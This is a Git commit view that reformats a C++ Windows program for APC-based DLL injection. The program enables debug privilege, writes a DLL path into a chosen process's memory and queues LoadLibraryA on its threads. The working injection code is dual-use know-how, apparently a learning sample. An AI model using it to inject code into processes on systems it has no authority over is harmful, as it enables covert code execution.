update
LycorisGuard 2018-08-14 17:39:28 +08:00
джерело c06a8f852d
коміт c3c17b5bba
2 змінених файлів з 66 додано та 66 видалено

@ -3,15 +3,15 @@
// Used by APC.rc
//
#define IDS_APP_TITLE 103
#define IDS_APP_TITLE 103
// 新对象的下一组默认值
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif

@ -18,121 +18,121 @@ using namespace std;
#define DEF_BUF_SIZE 1024
BOOL AdjustPrivilege();
BOOL InjectModuleToProcessById ( DWORD dwProcessId );
BOOL InjectModuleToProcessById(DWORD dwProcessId);
// 用于存储注入模块DLL的路径全名
char szDllPath[DEF_BUF_SIZE] = {0} ;
int _tmain(int argc, _TCHAR* argv[])
{
// 取得当前工作目录路径
GetCurrentDirectoryA ( DEF_BUF_SIZE, szDllPath ) ;
// 取得当前工作目录路径
GetCurrentDirectoryA(DEF_BUF_SIZE, szDllPath);
// 生成注入模块DLL的路径全名
// 生成注入模块DLL的路径全名
#ifdef _WIN64
strcat ( szDllPath, "\\Dllx64.dll" ) ;
strcat ( szDllPath, "\\Dllx64.dll" ) ;
#else
strcat ( szDllPath, "\\Dllx86.dll" ) ;
strcat ( szDllPath, "\\Dllx86.dll" ) ;
#endif
DWORD dwProcessId = 0 ;
// 接收用户输入的目标进程ID
while ( cout << "请输入目标进程ID" && cin >> dwProcessId && dwProcessId > 0 )
{
BOOL bRet = InjectModuleToProcessById ( dwProcessId ) ;
cout << (bRet ? "注入成功":"注入失败") << endl ;
}
return 0;
DWORD dwProcessId = 0 ;
// 接收用户输入的目标进程ID
while( cout << "请输入目标进程ID" && cin >> dwProcessId && dwProcessId > 0 )
{
BOOL bRet = InjectModuleToProcessById(dwProcessId);
cout << (bRet ? "注入成功":"注入失败") << endl ;
}
return 0;
}
// 使用APC机制向指定ID的进程注入模块
BOOL InjectModuleToProcessById ( DWORD dwProcessId )
BOOL InjectModuleToProcessById(DWORD dwProcessId)
{
SIZE_T dwRet = 0;
SIZE_T dwRet = 0;
BOOL bStatus = FALSE ;
LPVOID lpData = NULL ;
UINT uLen = strlen(szDllPath) + 1;
AdjustPrivilege(); //
AdjustPrivilege(); //
// 打开目标进程
HANDLE hProcess = OpenProcess ( PROCESS_ALL_ACCESS, FALSE, dwProcessId ) ;
if ( hProcess )
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if(hProcess)
{
// 分配空间
lpData = VirtualAllocEx ( hProcess, NULL, uLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE ) ;
lpData = VirtualAllocEx ( hProcess, NULL, uLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if ( lpData )
{
// 写入需要注入的模块路径全名
bStatus = WriteProcessMemory ( hProcess, lpData, szDllPath, uLen, (SIZE_T*)(&dwRet) ) ;
bStatus = WriteProcessMemory(hProcess, lpData, szDllPath, uLen, (SIZE_T*)(&dwRet));
}
CloseHandle ( hProcess ) ;
CloseHandle(hProcess);
}
if ( bStatus == FALSE )
if (bStatus == FALSE)
return FALSE ;
// 创建线程快照
THREADENTRY32 te32 = { sizeof(THREADENTRY32) } ;
HANDLE hThreadSnap = CreateToolhelp32Snapshot ( TH32CS_SNAPTHREAD, 0 ) ;
if ( hThreadSnap == INVALID_HANDLE_VALUE )
THREADENTRY32 te32 = { sizeof(THREADENTRY32) };
HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if(hThreadSnap == INVALID_HANDLE_VALUE)
return FALSE ;
bStatus = FALSE ;
// 枚举所有线程
if ( Thread32First ( hThreadSnap, &te32 ) )
if(Thread32First(hThreadSnap, &te32))
{
do{
// 判断是否目标进程中的线程
if ( te32.th32OwnerProcessID == dwProcessId )
if(te32.th32OwnerProcessID == dwProcessId)
{
// 打开线程
HANDLE hThread = OpenThread ( THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID ) ;
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
if ( hThread )
{
// 向指定线程添加APC
DWORD dwRet1 = QueueUserAPC ( (PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)lpData ) ;
DWORD dwRet1 = QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)lpData);
if ( dwRet1 > 0 )
{
bStatus = TRUE ;
}
CloseHandle ( hThread ) ;
{
bStatus = TRUE ;
}
CloseHandle(hThread);
}
}
}while ( Thread32Next ( hThreadSnap, &te32 ) ) ;
}while(Thread32Next ( hThreadSnap, &te32));
}
CloseHandle ( hThreadSnap ) ;
CloseHandle(hThreadSnap);
return bStatus;
}
BOOL AdjustPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES pTP;
LUID uID;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
printf("OpenProcessToken is Error\n");
return false;
}
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&uID)) //调式
{
printf("LookupPrivilegeValue is Error\n");
return false;
}
pTP.PrivilegeCount = 1;
pTP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
pTP.Privileges[0].Luid = uID;
//在这里我们进行调整权限
if (!AdjustTokenPrivileges(hToken,false,&pTP,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
printf("AdjuestTokenPrivileges is Error\n");
return false;
}
return true;
HANDLE hToken;
TOKEN_PRIVILEGES pTP;
LUID uID;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
printf("OpenProcessToken is Error\n");
return false;
}
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&uID)) //调式
{
printf("LookupPrivilegeValue is Error\n");
return false;
}
pTP.PrivilegeCount = 1;
pTP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
pTP.Privileges[0].Luid = uID;
//在这里我们进行调整权限
if (!AdjustTokenPrivileges(hToken,false,&pTP,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
printf("AdjuestTokenPrivileges is Error\n");
return false;
}
return true;
}